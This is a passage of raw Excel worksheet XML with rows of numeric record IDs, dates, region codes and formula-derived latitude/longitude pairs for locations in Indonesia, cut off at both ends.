        <v>197</v>
      </c>
      <c r="J3607" t="s">
        <v>6509</v>
      </c>
      <c r="L3607" t="s">
        <v>11916</v>
      </c>
      <c r="M3607">
        <v>6304140005</v>
      </c>
      <c r="N3607">
        <v>6304140</v>
      </c>
      <c r="O3607">
        <v>6304</v>
      </c>
      <c r="P3607">
        <v>63</v>
      </c>
      <c r="Q3607" t="s">
        <v>11917</v>
      </c>
      <c r="R3607" t="s">
        <v>11918</v>
      </c>
      <c r="S3607" t="s">
        <v>8851</v>
      </c>
      <c r="T3607" t="s">
        <v>6513</v>
      </c>
      <c r="U3607" s="5">
        <v>11476582</v>
      </c>
      <c r="V3607" s="5" t="s">
        <v>17698</v>
      </c>
      <c r="W3607" s="5">
        <v>-297864</v>
      </c>
      <c r="X3607" t="s">
        <v>21431</v>
      </c>
      <c r="Y3607" t="str">
        <f t="shared" si="56"/>
        <v>-2.97864,114.76582</v>
      </c>
    </row>
    <row r="3608" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3608">
        <v>282417</v>
      </c>
      <c r="B3608" s="1">
        <v>44254</v>
      </c>
      <c r="C3608" s="2">
        <v>0.10181712962962963</v>
      </c>
      <c r="D3608" t="s">
        <v>22</v>
      </c>
      <c r="E3608" t="s">
        <v>23</v>
      </c>
      <c r="F3608" t="s">
        <v>11919</v>
      </c>
      <c r="G3608" t="s">
        <v>11920</v>
      </c>
      <c r="H3608" t="s">
        <v>26</v>
      </c>
      <c r="I3608" t="s">
        <v>27</v>
      </c>
      <c r="J3608" t="s">
        <v>2627</v>
      </c>
      <c r="L3608" t="s">
        <v>11921</v>
      </c>
      <c r="M3608">
        <v>3275030004</v>
      </c>
      <c r="N3608">
        <v>3275030</v>
      </c>
      <c r="O3608">
        <v>3275</v>
      </c>
      <c r="P3608">
        <v>32</v>
      </c>
      <c r="Q3608" t="s">
        <v>11385</v>
      </c>
      <c r="R3608" t="s">
        <v>11385</v>
      </c>
      <c r="S3608" t="s">
        <v>41</v>
      </c>
      <c r="T3608" t="s">
        <v>42</v>
      </c>
      <c r="U3608" s="5">
        <v>10698731</v>
      </c>
      <c r="V3608" s="5" t="s">
        <v>17699</v>
      </c>
      <c r="W3608" s="5">
        <v>-631589</v>
      </c>
      <c r="X3608" t="s">
        <v>21432</v>
      </c>
      <c r="Y3608" t="str">
        <f t="shared" si="56"/>
        <v>-6.31589,106.98731</v>
      </c>
    </row>
    <row r="3609" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3609">
        <v>282420</v>
      </c>
      <c r="B3609" s="1">
        <v>44254</v>
      </c>
      <c r="C3609" s="2">
        <v>0.23402777777777781</v>
      </c>
      <c r="D3609" t="s">
        <v>2648</v>
      </c>
      <c r="E3609" t="s">
        <v>23</v>
      </c>
      <c r="G3609" t="s">
        <v>11922</v>
      </c>
      <c r="H3609" t="s">
        <v>26</v>
      </c>
      <c r="I3609" t="s">
        <v>608</v>
      </c>
      <c r="J3609" t="s">
        <v>3347</v>
      </c>
      <c r="L3609" t="s">
        <v>11923</v>
      </c>
      <c r="M3609">
        <v>3173040003</v>
      </c>
      <c r="N3609">
        <v>3173040</v>
      </c>
      <c r="O3609">
        <v>3173</v>
      </c>
      <c r="P3609">
        <v>31</v>
      </c>
      <c r="Q3609" t="s">
        <v>2346</v>
      </c>
      <c r="R3609" t="s">
        <v>1598</v>
      </c>
      <c r="S3609" t="s">
        <v>62</v>
      </c>
      <c r="T3609" t="s">
        <v>33</v>
      </c>
      <c r="U3609" s="5">
        <v>10684895</v>
      </c>
      <c r="V3609" s="5" t="s">
        <v>17700</v>
      </c>
      <c r="W3609" s="5">
        <v>-617933</v>
      </c>
      <c r="X3609" t="s">
        <v>18951</v>
      </c>
      <c r="Y3609" t="str">
        <f t="shared" si="56"/>
        <v>-6.17933,106.84895</v>
      </c>
    </row>
    <row r="3610" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3610">
        <v>282440</v>
      </c>
      <c r="B3610" s="1">
        <v>44254</v>
      </c>
      <c r="C3610" s="2">
        <v>0.2981712962962963</v>
      </c>
      <c r="D3610" t="s">
        <v>22</v>
      </c>
      <c r="E3610" t="s">
        <v>23</v>
      </c>
      <c r="F3610" t="s">
        <v>11924</v>
      </c>
      <c r="H3610" t="s">
        <v>26</v>
      </c>
      <c r="I3610" t="s">
        <v>3069</v>
      </c>
      <c r="J3610" t="s">
        <v>2622</v>
      </c>
      <c r="L3610" t="s">
        <v>11925</v>
      </c>
      <c r="M3610">
        <v>3578200007</v>
      </c>
      <c r="N3610">
        <v>3578200</v>
      </c>
      <c r="O3610">
        <v>3578</v>
      </c>
      <c r="P3610">
        <v>35</v>
      </c>
      <c r="Q3610" t="s">
        <v>11926</v>
      </c>
      <c r="R3610" t="s">
        <v>11927</v>
      </c>
      <c r="S3610" t="s">
        <v>1346</v>
      </c>
      <c r="T3610" t="s">
        <v>1221</v>
      </c>
      <c r="U3610" s="5">
        <v>11277029</v>
      </c>
      <c r="V3610" s="5" t="s">
        <v>17701</v>
      </c>
      <c r="W3610" s="5">
        <v>-723683</v>
      </c>
      <c r="X3610" t="s">
        <v>21433</v>
      </c>
      <c r="Y3610" t="str">
        <f t="shared" si="56"/>
        <v>-7.23683,112.77029</v>
      </c>
    </row>
    <row r="3611" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3611">
        <v>282441</v>
      </c>
      <c r="B3611" s="1">
        <v>44254</v>
      </c>
      <c r="C3611" s="2">
        <v>0.6280324074074074</v>
      </c>
      <c r="D3611" t="s">
        <v>22</v>
      </c>
      <c r="E3611" t="s">
        <v>23</v>
      </c>
      <c r="F3611" t="s">
        <v>11928</v>
      </c>
      <c r="G3611" t="s">
        <v>11929</v>
      </c>
      <c r="H3611" t="s">
        <v>26</v>
      </c>
      <c r="I3611" t="s">
        <v>1651</v>
      </c>
      <c r="J3611" t="s">
        <v>7277</v>
      </c>
      <c r="L3611" t="s">
        <v>11930</v>
      </c>
      <c r="M3611">
        <v>5171031011</v>
      </c>
      <c r="N3611">
        <v>5171031</v>
      </c>
      <c r="O3611">
        <v>5171</v>
      </c>
      <c r="P3611">
        <v>51</v>
      </c>
      <c r="Q3611" t="s">
        <v>11931</v>
      </c>
      <c r="R3611" t="s">
        <v>11932</v>
      </c>
      <c r="S3611" t="s">
        <v>9135</v>
      </c>
      <c r="T3611" t="s">
        <v>7282</v>
      </c>
      <c r="U3611" s="5">
        <v>11522094</v>
      </c>
      <c r="V3611" s="5" t="s">
        <v>17702</v>
      </c>
      <c r="W3611" s="5">
        <v>-862126</v>
      </c>
      <c r="X3611" t="s">
        <v>21434</v>
      </c>
      <c r="Y3611" t="str">
        <f t="shared" si="56"/>
        <v>-8.62126,115.22094</v>
      </c>
    </row>
    <row r="3612" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3612">
        <v>282442</v>
      </c>
      <c r="B3612" s="1">
        <v>44256</v>
      </c>
      <c r="C3612" s="2">
        <v>0.13333333333333333</v>
      </c>
      <c r="D3612" t="s">
        <v>2648</v>
      </c>
      <c r="E3612" t="s">
        <v>23</v>
      </c>
      <c r="G3612" t="s">
        <v>11933</v>
      </c>
      <c r="H3612" t="s">
        <v>26</v>
      </c>
      <c r="J3612" t="s">
        <v>3135</v>
      </c>
      <c r="L3612" t="s">
        <v>2716</v>
      </c>
      <c r="M3612">
        <v>3671060005</v>
      </c>
      <c r="N3612">
        <v>3671060</v>
      </c>
      <c r="O3612">
        <v>3671</v>
      </c>
      <c r="P3612">
        <v>36</v>
      </c>
      <c r="Q3612" t="s">
        <v>1961</v>
      </c>
      <c r="R3612" t="s">
        <v>1961</v>
      </c>
      <c r="S3612" t="s">
        <v>201</v>
      </c>
      <c r="T3612" t="s">
        <v>171</v>
      </c>
      <c r="U3612" s="5">
        <v>10668806</v>
      </c>
      <c r="V3612" s="5" t="s">
        <v>17703</v>
      </c>
      <c r="W3612" s="5">
        <v>-611432</v>
      </c>
      <c r="X3612" t="s">
        <v>21435</v>
      </c>
      <c r="Y3612" t="str">
        <f t="shared" si="56"/>
        <v>-6.11432,106.68806</v>
      </c>
    </row>
    <row r="3613" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3613">
        <v>282466</v>
      </c>
      <c r="B3613" s="1">
        <v>44259</v>
      </c>
      <c r="C3613" s="2">
        <v>0.24174768518518519</v>
      </c>
      <c r="D3613" t="s">
        <v>85</v>
      </c>
      <c r="E3613" t="s">
        <v>23</v>
      </c>
      <c r="F3613" t="s">
        <v>11934</v>
      </c>
      <c r="G3613" t="s">
        <v>11935</v>
      </c>
      <c r="H3613" t="s">
        <v>26</v>
      </c>
      <c r="J3613" t="s">
        <v>6038</v>
      </c>
      <c r="K3613" t="s">
        <v>11936</v>
      </c>
      <c r="L3613" t="s">
        <v>11937</v>
      </c>
      <c r="M3613">
        <v>1210030008</v>
      </c>
      <c r="N3613">
        <v>1210030</v>
      </c>
      <c r="O3613">
        <v>1210</v>
      </c>
      <c r="P3613">
        <v>12</v>
      </c>
      <c r="Q3613" t="s">
        <v>11938</v>
      </c>
      <c r="R3613" t="s">
        <v>11939</v>
      </c>
      <c r="S3613" t="s">
        <v>11940</v>
      </c>
      <c r="T3613" t="s">
        <v>6043</v>
      </c>
      <c r="U3613" s="5">
        <v>9831426</v>
      </c>
      <c r="V3613" s="5" t="s">
        <v>17704</v>
      </c>
      <c r="W3613" s="5">
        <v>274947</v>
      </c>
      <c r="X3613" t="s">
        <v>21436</v>
      </c>
      <c r="Y3613" t="str">
        <f t="shared" si="56"/>
        <v>2.74947,98.31426</v>
      </c>
    </row>
    <row r="3614" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3614">
        <v>282468</v>
      </c>
      <c r="B3614" s="1">
        <v>44259</v>
      </c>
      <c r="C3614" s="2">
        <v>0.72291666666666676</v>
      </c>
      <c r="D3614" t="s">
        <v>2648</v>
      </c>
      <c r="E3614" t="s">
        <v>23</v>
      </c>
      <c r="G3614" t="s">
        <v>11941</v>
      </c>
      <c r="H3614" t="s">
        <v>26</v>
      </c>
      <c r="I3614" t="s">
        <v>608</v>
      </c>
      <c r="J3614" t="s">
        <v>387</v>
      </c>
      <c r="L3614" t="s">
        <v>11942</v>
      </c>
      <c r="M3614">
        <v>3174040007</v>
      </c>
      <c r="N3614">
        <v>3174040</v>
      </c>
      <c r="O3614">
        <v>3174</v>
      </c>
      <c r="P3614">
        <v>31</v>
      </c>
      <c r="Q3614" t="s">
        <v>389</v>
      </c>
      <c r="R3614" t="s">
        <v>377</v>
      </c>
      <c r="S3614" t="s">
        <v>32</v>
      </c>
      <c r="T3614" t="s">
        <v>33</v>
      </c>
      <c r="U3614" s="5">
        <v>10678173</v>
      </c>
      <c r="V3614" s="5" t="s">
        <v>17705</v>
      </c>
      <c r="W3614" s="5">
        <v>-615094</v>
      </c>
      <c r="X3614" t="s">
        <v>21437</v>
      </c>
      <c r="Y3614" t="str">
        <f t="shared" si="56"/>
        <v>-6.15094,106.78173</v>
      </c>
    </row>
    <row r="3615" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3615">
        <v>282530</v>
      </c>
      <c r="B3615" s="1">
        <v>44260</v>
      </c>
      <c r="C3615" s="2">
        <v>0.47495370370370371</v>
      </c>
      <c r="D3615" t="s">
        <v>22</v>
      </c>
      <c r="E3615" t="s">
        <v>23</v>
      </c>
      <c r="F3615" t="s">
        <v>11943</v>
      </c>
      <c r="G3615" t="s">
        <v>11944</v>
      </c>
      <c r="H3615" t="s">
        <v>7978</v>
      </c>
      <c r="I3615" t="s">
        <v>7979</v>
      </c>
      <c r="J3615" t="s">
        <v>11945</v>
      </c>
      <c r="L3615" t="s">
        <v>11946</v>
      </c>
      <c r="M3615">
        <v>3171070004</v>
      </c>
      <c r="N3615">
        <v>3171070</v>
      </c>
      <c r="O3615">
        <v>3171</v>
      </c>
      <c r="P3615">
        <v>31</v>
      </c>
      <c r="Q3615" t="s">
        <v>121</v>
      </c>
      <c r="R3615" t="s">
        <v>121</v>
      </c>
      <c r="S3615" t="s">
        <v>108</v>
      </c>
      <c r="T3615" t="s">
        <v>33</v>
      </c>
      <c r="U3615" s="5">
        <v>10682709</v>
      </c>
      <c r="V3615" s="5" t="s">
        <v>17706</v>
      </c>
      <c r="W3615" s="5">
        <v>-624073</v>
      </c>
      <c r="X3615" t="s">
        <v>21438</v>
      </c>
      <c r="Y3615" t="str">
        <f t="shared" si="56"/>
        <v>-6.24073,106.82709</v>
      </c>
    </row>
    <row r="3616" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3616">
        <v>282531</v>
      </c>
      <c r="B3616" s="1">
        <v>44260</v>
      </c>
      <c r="C3616" s="2">
        <v>0.7319444444444444</v>
      </c>
      <c r="D3616" t="s">
        <v>2648</v>
      </c>
      <c r="E3616" t="s">
        <v>23</v>
      </c>
      <c r="G3616" t="s">
        <v>11947</v>
      </c>
      <c r="H3616" t="s">
        <v>26</v>
      </c>
      <c r="J3616" t="s">
        <v>387</v>
      </c>
      <c r="L3616" t="s">
        <v>11948</v>
      </c>
      <c r="M3616">
        <v>3174040007</v>
      </c>
      <c r="N3616">
        <v>3174040</v>
      </c>
      <c r="O3616">
        <v>3174</v>
      </c>
      <c r="P3616">
        <v>31</v>
      </c>
      <c r="Q3616" t="s">
        <v>389</v>
      </c>
      <c r="R3616" t="s">
        <v>377</v>
      </c>
      <c r="S3616" t="s">
        <v>32</v>
      </c>
      <c r="T3616" t="s">
        <v>33</v>
      </c>
      <c r="U3616" s="5">
        <v>10678173</v>
      </c>
      <c r="V3616" s="5" t="s">
        <v>17705</v>
      </c>
      <c r="W3616" s="5">
        <v>-615090</v>
      </c>
      <c r="X3616" t="s">
        <v>21439</v>
      </c>
      <c r="Y3616" t="str">
        <f t="shared" si="56"/>
        <v>-6.15090,106.78173</v>
      </c>
    </row>
    <row r="3617" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3617">
        <v>282572</v>
      </c>
      <c r="B3617" s="1">
        <v>44262</v>
      </c>
      <c r="C3617" s="2">
        <v>0.28775462962962961</v>
      </c>
      <c r="D3617" t="s">
        <v>22</v>
      </c>
      <c r="E3617" t="s">
        <v>23</v>
      </c>
      <c r="F3617" t="s">
        <v>11949</v>
      </c>
      <c r="G3617" t="s">
        <v>11950</v>
      </c>
      <c r="H3617" t="s">
        <v>7978</v>
      </c>
      <c r="I3617" t="s">
        <v>7983</v>
      </c>
      <c r="J3617" t="s">
        <v>4849</v>
      </c>
      <c r="M3617">
        <v>3173060004</v>
      </c>
      <c r="N3617">
        <v>3173060</v>
      </c>
      <c r="O3617">
        <v>3173</v>
      </c>
      <c r="P3617">
        <v>31</v>
      </c>
      <c r="Q3617" t="s">
        <v>4713</v>
      </c>
      <c r="R3617" t="s">
        <v>61</v>
      </c>
      <c r="S3617" t="s">
        <v>62</v>
      </c>
      <c r="T3617" t="s">
        <v>33</v>
      </c>
      <c r="U3617" s="5">
        <v>10685752</v>
      </c>
      <c r="V3617" s="5" t="s">
        <v>17707</v>
      </c>
      <c r="W3617" s="5">
        <v>-615915</v>
      </c>
      <c r="X3617" t="s">
        <v>21440</v>
      </c>
      <c r="Y3617" t="str">
        <f t="shared" si="56"/>
        <v>-6.15915,106.85752</v>
      </c>
    </row>
    <row r="3618" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3618">
        <v>282573</v>
      </c>
      <c r="B3618" s="1">
        <v>44262</v>
      </c>
      <c r="C3618" s="2">
        <v>0.36527777777777781</v>
      </c>
      <c r="D3618" t="s">
        <v>2648</v>
      </c>
      <c r="E3618" t="s">
        <v>23</v>
      </c>
      <c r="G3618" t="s">
        <v>11951</v>
      </c>
      <c r="H3618" t="s">
        <v>26</v>
      </c>
      <c r="J3618" t="s">
        <v>6050</v>
      </c>
      <c r="L3618" t="s">
        <v>11952</v>
      </c>
      <c r="M3618">
        <v>3172020005</v>
      </c>
      <c r="N3618">
        <v>3172020</v>
      </c>
      <c r="O3618">
        <v>3172</v>
      </c>
      <c r="P3618">
        <v>31</v>
      </c>
      <c r="Q3618" t="s">
        <v>3744</v>
      </c>
      <c r="R3618" t="s">
        <v>1644</v>
      </c>
      <c r="S3618" t="s">
        <v>49</v>
      </c>
      <c r="T3618" t="s">
        <v>33</v>
      </c>
      <c r="U3618" s="5">
        <v>10688190</v>
      </c>
      <c r="V3618" s="5" t="s">
        <v>17708</v>
      </c>
      <c r="W3618" s="5">
        <v>-631766</v>
      </c>
      <c r="X3618" t="s">
        <v>21441</v>
      </c>
      <c r="Y3618" t="str">
        <f t="shared" si="56"/>
        <v>-6.31766,106.88190</v>
      </c>
    </row>
    <row r="3619" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3619">
        <v>282574</v>
      </c>
      <c r="B3619" s="1">
        <v>44262</v>
      </c>
      <c r="C3619" s="2">
        <v>0.3659722222222222</v>
      </c>
      <c r="D3619" t="s">
        <v>2648</v>
      </c>
      <c r="E3619" t="s">
        <v>23</v>
      </c>
      <c r="G3619" t="s">
        <v>11953</v>
      </c>
      <c r="H3619" t="s">
        <v>26</v>
      </c>
      <c r="J3619" t="s">
        <v>8233</v>
      </c>
      <c r="L3619" t="s">
        <v>11954</v>
      </c>
      <c r="M3619">
        <v>3172020005</v>
      </c>
      <c r="N3619">
        <v>3172020</v>
      </c>
      <c r="O3619">
        <v>3172</v>
      </c>
      <c r="P3619">
        <v>31</v>
      </c>
      <c r="Q3619" t="s">
        <v>3744</v>
      </c>
      <c r="R3619" t="s">
        <v>1644</v>
      </c>
      <c r="S3619" t="s">
        <v>49</v>
      </c>
      <c r="T3619" t="s">
        <v>33</v>
      </c>
      <c r="U3619" s="5">
        <v>10687453</v>
      </c>
      <c r="V3619" s="5" t="s">
        <v>17709</v>
      </c>
      <c r="W3619" s="5">
        <v>-630225</v>
      </c>
      <c r="X3619" t="s">
        <v>21442</v>
      </c>
      <c r="Y3619" t="str">
        <f t="shared" si="56"/>
        <v>-6.30225,106.87453</v>
      </c>
    </row>
    <row r="3620" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3620">
        <v>282575</v>
      </c>
      <c r="B3620" s="1">
        <v>44262</v>
      </c>
      <c r="C3620" s="2">
        <v>0.36249999999999999</v>
      </c>
      <c r="D3620" t="s">
        <v>2648</v>
      </c>
      <c r="E3620" t="s">
        <v>23</v>
      </c>
      <c r="G3620" t="s">
        <v>11955</v>
      </c>
      <c r="H3620" t="s">
        <v>26</v>
      </c>
      <c r="J3620" t="s">
        <v>6050</v>
      </c>
      <c r="L3620" t="s">
        <v>11956</v>
      </c>
      <c r="M3620">
        <v>3172020005</v>
      </c>
      <c r="N3620">
        <v>3172020</v>
      </c>
      <c r="O3620">
        <v>3172</v>
      </c>
      <c r="P3620">
        <v>31</v>
      </c>
      <c r="Q3620" t="s">
        <v>3744</v>
      </c>
      <c r="R3620" t="s">
        <v>1644</v>
      </c>
      <c r="S3620" t="s">
        <v>49</v>
      </c>
      <c r="T3620" t="s">
        <v>33</v>
      </c>
      <c r="U3620" s="5">
        <v>10688192</v>
      </c>
      <c r="V3620" s="5" t="s">
        <v>17710</v>
      </c>
      <c r="W3620" s="5">
        <v>-631755</v>
      </c>
      <c r="X3620" t="s">
        <v>21443</v>
      </c>
      <c r="Y3620" t="str">
        <f t="shared" si="56"/>
        <v>-6.31755,106.88192</v>
      </c>
    </row>
    <row r="3621" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3621">
        <v>282632</v>
      </c>
      <c r="B3621" s="1">
        <v>44262</v>
      </c>
      <c r="C3621" s="2">
        <v>0.36041666666666666</v>
      </c>
      <c r="D3621" t="s">
        <v>2648</v>
      </c>
      <c r="E3621" t="s">
        <v>23</v>
      </c>
      <c r="G3621" t="s">
        <v>11957</v>
      </c>
      <c r="H3621" t="s">
        <v>26</v>
      </c>
      <c r="J3621" t="s">
        <v>6050</v>
      </c>
      <c r="L3621" t="s">
        <v>11958</v>
      </c>
      <c r="M3621">
        <v>3172020005</v>
      </c>
      <c r="N3621">
        <v>3172020</v>
      </c>
      <c r="O3621">
        <v>3172</v>
      </c>
      <c r="P3621">
        <v>31</v>
      </c>
      <c r="Q3621" t="s">
        <v>3744</v>
      </c>
      <c r="R3621" t="s">
        <v>1644</v>
      </c>
      <c r="S3621" t="s">
        <v>49</v>
      </c>
      <c r="T3621" t="s">
        <v>33</v>
      </c>
      <c r="U3621" s="5">
        <v>10688195</v>
      </c>
      <c r="V3621" s="5" t="s">
        <v>15120</v>
      </c>
      <c r="W3621" s="5">
        <v>-631762</v>
      </c>
      <c r="X3621" t="s">
        <v>21444</v>
      </c>
      <c r="Y3621" t="str">
        <f t="shared" si="56"/>
        <v>-6.31762,106.88195</v>
      </c>
    </row>
    <row r="3622" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3622">
        <v>283240</v>
      </c>
      <c r="B3622" s="1">
        <v>44262</v>
      </c>
      <c r="C3622" s="2">
        <v>0.95953703703703708</v>
      </c>
      <c r="D3622" t="s">
        <v>22</v>
      </c>
      <c r="E3622" t="s">
        <v>23</v>
      </c>
      <c r="F3622" t="s">
        <v>11959</v>
      </c>
      <c r="G3622" t="s">
        <v>11960</v>
      </c>
      <c r="H3622" t="s">
        <v>26</v>
      </c>
      <c r="I3622" t="s">
        <v>3024</v>
      </c>
      <c r="J3622" t="s">
        <v>2622</v>
      </c>
      <c r="M3622">
        <v>3571010005</v>
      </c>
      <c r="N3622">
        <v>3571010</v>
      </c>
      <c r="O3622">
        <v>3571</v>
      </c>
      <c r="P3622">
        <v>35</v>
      </c>
      <c r="Q3622" t="s">
        <v>9652</v>
      </c>
      <c r="R3622" t="s">
        <v>8660</v>
      </c>
      <c r="S3622" t="s">
        <v>8365</v>
      </c>
      <c r="T3622" t="s">
        <v>1221</v>
      </c>
      <c r="U3622" s="5">
        <v>11200002</v>
      </c>
      <c r="V3622" s="5" t="s">
        <v>17711</v>
      </c>
      <c r="W3622" s="5">
        <v>-782651</v>
      </c>
      <c r="X3622" t="s">
        <v>21445</v>
      </c>
      <c r="Y3622" t="str">
        <f t="shared" si="56"/>
        <v>-7.82651,112.00002</v>
      </c>
    </row>
    <row r="3623" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3623">
        <v>283368</v>
      </c>
      <c r="B3623" s="1">
        <v>44263</v>
      </c>
      <c r="C3623" s="2">
        <v>5.7638888888888885E-2</v>
      </c>
      <c r="D3623" t="s">
        <v>2648</v>
      </c>
      <c r="E3623" t="s">
        <v>23</v>
      </c>
      <c r="G3623" t="s">
        <v>11961</v>
      </c>
      <c r="H3623" t="s">
        <v>26</v>
      </c>
      <c r="J3623" t="s">
        <v>7739</v>
      </c>
      <c r="L3623" t="s">
        <v>11962</v>
      </c>
      <c r="M3623">
        <v>3174060008</v>
      </c>
      <c r="N3623">
        <v>3174060</v>
      </c>
      <c r="O3623">
        <v>3174</v>
      </c>
      <c r="P3623">
        <v>31</v>
      </c>
      <c r="Q3623" t="s">
        <v>7741</v>
      </c>
      <c r="R3623" t="s">
        <v>1762</v>
      </c>
      <c r="S3623" t="s">
        <v>32</v>
      </c>
      <c r="T3623" t="s">
        <v>33</v>
      </c>
      <c r="U3623" s="5">
        <v>10681334</v>
      </c>
      <c r="V3623" s="5" t="s">
        <v>17712</v>
      </c>
      <c r="W3623" s="5">
        <v>-613804</v>
      </c>
      <c r="X3623" t="s">
        <v>21446</v>
      </c>
      <c r="Y3623" t="str">
        <f t="shared" si="56"/>
        <v>-6.13804,106.81334</v>
      </c>
    </row>
    <row r="3624" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3624">
        <v>284324</v>
      </c>
      <c r="B3624" s="1">
        <v>44264</v>
      </c>
      <c r="C3624" s="2">
        <v>8.3668981481481483E-2</v>
      </c>
      <c r="D3624" t="s">
        <v>22</v>
      </c>
      <c r="E3624" t="s">
        <v>23</v>
      </c>
      <c r="F3624" t="s">
        <v>11963</v>
      </c>
      <c r="G3624" t="s">
        <v>11964</v>
      </c>
      <c r="H3624" t="s">
        <v>26</v>
      </c>
      <c r="I3624" t="s">
        <v>908</v>
      </c>
      <c r="J3624" t="s">
        <v>2622</v>
      </c>
      <c r="L3624" t="s">
        <v>11965</v>
      </c>
      <c r="M3624">
        <v>3505190012</v>
      </c>
      <c r="N3624">
        <v>3505190</v>
      </c>
      <c r="O3624">
        <v>3505</v>
      </c>
      <c r="P3624">
        <v>35</v>
      </c>
      <c r="Q3624" t="s">
        <v>11966</v>
      </c>
      <c r="R3624" t="s">
        <v>11967</v>
      </c>
      <c r="S3624" t="s">
        <v>9602</v>
      </c>
      <c r="T3624" t="s">
        <v>1221</v>
      </c>
      <c r="U3624" s="5">
        <v>11211431</v>
      </c>
      <c r="V3624" s="5" t="s">
        <v>17713</v>
      </c>
      <c r="W3624" s="5">
        <v>-800726</v>
      </c>
      <c r="X3624" t="s">
        <v>21447</v>
      </c>
      <c r="Y3624" t="str">
        <f t="shared" si="56"/>
        <v>-8.00726,112.11431</v>
      </c>
    </row>
    <row r="3625" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3625">
        <v>284348</v>
      </c>
      <c r="B3625" s="1">
        <v>44264</v>
      </c>
      <c r="C3625" s="2">
        <v>0.35075231481481484</v>
      </c>
      <c r="D3625" t="s">
        <v>22</v>
      </c>
      <c r="E3625" t="s">
        <v>23</v>
      </c>
      <c r="F3625" t="s">
        <v>11968</v>
      </c>
      <c r="G3625" t="s">
        <v>11969</v>
      </c>
      <c r="H3625" t="s">
        <v>26</v>
      </c>
      <c r="I3625" t="s">
        <v>517</v>
      </c>
      <c r="J3625" t="s">
        <v>2622</v>
      </c>
      <c r="L3625" t="s">
        <v>11970</v>
      </c>
      <c r="M3625">
        <v>3513200009</v>
      </c>
      <c r="N3625">
        <v>3513200</v>
      </c>
      <c r="O3625">
        <v>3513</v>
      </c>
      <c r="P3625">
        <v>35</v>
      </c>
      <c r="Q3625" t="s">
        <v>11971</v>
      </c>
      <c r="R3625" t="s">
        <v>11972</v>
      </c>
      <c r="S3625" t="s">
        <v>7240</v>
      </c>
      <c r="T3625" t="s">
        <v>1221</v>
      </c>
      <c r="U3625" s="5">
        <v>11324937</v>
      </c>
      <c r="V3625" s="5" t="s">
        <v>17714</v>
      </c>
      <c r="W3625" s="5">
        <v>-776437</v>
      </c>
      <c r="X3625" t="s">
        <v>21448</v>
      </c>
      <c r="Y3625" t="str">
        <f t="shared" si="56"/>
        <v>-7.76437,113.24937</v>
      </c>
    </row>
    <row r="3626" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3626">
        <v>284349</v>
      </c>
      <c r="B3626" s="1">
        <v>44264</v>
      </c>
      <c r="C3626" s="2">
        <v>0.6526967592592593</v>
      </c>
      <c r="D3626" t="s">
        <v>22</v>
      </c>
      <c r="E3626" t="s">
        <v>23</v>
      </c>
      <c r="F3626" t="s">
        <v>11973</v>
      </c>
      <c r="G3626" t="s">
        <v>11974</v>
      </c>
      <c r="H3626" t="s">
        <v>26</v>
      </c>
      <c r="I3626" t="s">
        <v>974</v>
      </c>
      <c r="J3626" t="s">
        <v>3135</v>
      </c>
      <c r="L3626" t="s">
        <v>11975</v>
      </c>
      <c r="M3626">
        <v>3674060003</v>
      </c>
      <c r="N3626">
        <v>3674060</v>
      </c>
      <c r="O3626">
        <v>3674</v>
      </c>
      <c r="P3626">
        <v>36</v>
      </c>
      <c r="Q3626" t="s">
        <v>205</v>
      </c>
      <c r="R3626" t="s">
        <v>169</v>
      </c>
      <c r="S3626" t="s">
        <v>170</v>
      </c>
      <c r="T3626" t="s">
        <v>171</v>
      </c>
      <c r="U3626" s="5">
        <v>10669349</v>
      </c>
      <c r="V3626" s="5" t="s">
        <v>17715</v>
      </c>
      <c r="W3626" s="5">
        <v>-624861</v>
      </c>
      <c r="X3626" t="s">
        <v>21449</v>
      </c>
      <c r="Y3626" t="str">
        <f t="shared" si="56"/>
        <v>-6.24861,106.69349</v>
      </c>
    </row>
    <row r="3627" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3627">
        <v>284371</v>
      </c>
      <c r="B3627" s="1">
        <v>44265</v>
      </c>
      <c r="C3627" s="2">
        <v>0.12748842592592594</v>
      </c>
      <c r="D3627" t="s">
        <v>22</v>
      </c>
      <c r="E3627" t="s">
        <v>23</v>
      </c>
      <c r="F3627" t="s">
        <v>11976</v>
      </c>
      <c r="G3627" t="s">
        <v>11977</v>
      </c>
      <c r="H3627" t="s">
        <v>7086</v>
      </c>
      <c r="I3627" t="s">
        <v>7421</v>
      </c>
      <c r="J3627" t="s">
        <v>2622</v>
      </c>
      <c r="L3627" t="s">
        <v>11978</v>
      </c>
      <c r="M3627">
        <v>3517130013</v>
      </c>
      <c r="N3627">
        <v>3517130</v>
      </c>
      <c r="O3627">
        <v>3517</v>
      </c>
      <c r="P3627">
        <v>35</v>
      </c>
      <c r="Q3627" t="s">
        <v>11979</v>
      </c>
      <c r="R3627" t="s">
        <v>340</v>
      </c>
      <c r="S3627" t="s">
        <v>340</v>
      </c>
      <c r="T3627" t="s">
        <v>1221</v>
      </c>
      <c r="U3627" s="5">
        <v>11223806</v>
      </c>
      <c r="V3627" s="5" t="s">
        <v>17716</v>
      </c>
      <c r="W3627" s="5">
        <v>-753638</v>
      </c>
      <c r="X3627" t="s">
        <v>21450</v>
      </c>
      <c r="Y3627" t="str">
        <f t="shared" si="56"/>
        <v>-7.53638,112.23806</v>
      </c>
    </row>
    <row r="3628" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3628">
        <v>284373</v>
      </c>
      <c r="B3628" s="1">
        <v>44265</v>
      </c>
      <c r="C3628" s="2">
        <v>0.12541666666666665</v>
      </c>
      <c r="D3628" t="s">
        <v>22</v>
      </c>
